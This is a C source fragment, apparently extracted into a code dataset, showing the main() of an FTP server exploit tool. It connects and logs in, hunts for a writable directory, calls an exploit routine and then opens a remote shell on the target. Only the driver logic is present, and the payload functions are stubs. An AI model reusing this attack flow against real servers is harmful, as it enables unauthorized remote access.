
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;




typedef struct TYPE_6__ TYPE_3__ ;
typedef struct TYPE_5__ TYPE_2__ ;
typedef struct TYPE_4__ TYPE_1__ ;


struct TYPE_6__ {char* pwd; } ;
struct TYPE_5__ {int (* code ) () ;scalar_t__ need_writable; } ;
struct TYPE_4__ {scalar_t__ testonly; scalar_t__ dirscanonly; } ;


 int SIGINT ;
 int SIGQUIT ;
 int check_test_return (char*,int) ;
 int cleanup_and_exit () ;
 int connect_to_ftp () ;
 int err (int ,char*) ;
 int getpwd () ;
 TYPE_3__ hostinf ;
 int log_into_ftp () ;
 int parseargs (int,char**) ;
 int printf (char*,...) ;
 int recurse_writable () ;
 int shell () ;
 int sighandler ;
 int signal (int ,void*) ;
 TYPE_2__* sptr ;
 int stub1 () ;
 TYPE_1__ tesopt ;
 int title () ;
 int usage (char*) ;

int
main (int argc, char **argv)
{
        int i;
        title ();

        if (argc < 3)
                usage (argv[0]);

        signal (SIGINT, (void *) &sighandler);
        signal (SIGQUIT, (void *) &sighandler);

        parseargs (argc, argv);

        printf("Connecting...\n");
        connect_to_ftp ();

        log_into_ftp ();
        if (sptr->need_writable || tesopt.dirscanonly) {
            printf ("Logged in! Searching for a writable directory...\n");
            if (!recurse_writable())
                    err (0, "kurwa mac! no writable dir found\n");
        } else {
            printf ("Logged in!\n");
        }

        getpwd ();
        printf ("       %s is writable.. rock on!\n", hostinf.pwd);

        if (!tesopt.dirscanonly) {
            printf("Trying to sploit...\n");
            sptr->code();
            tesopt.testonly ? i = check_test_return("teso\n", 5) : shell();
            if (!i)
                printf ("sploiting not successfull\n");
        }

        cleanup_and_exit();
        return (0);
}
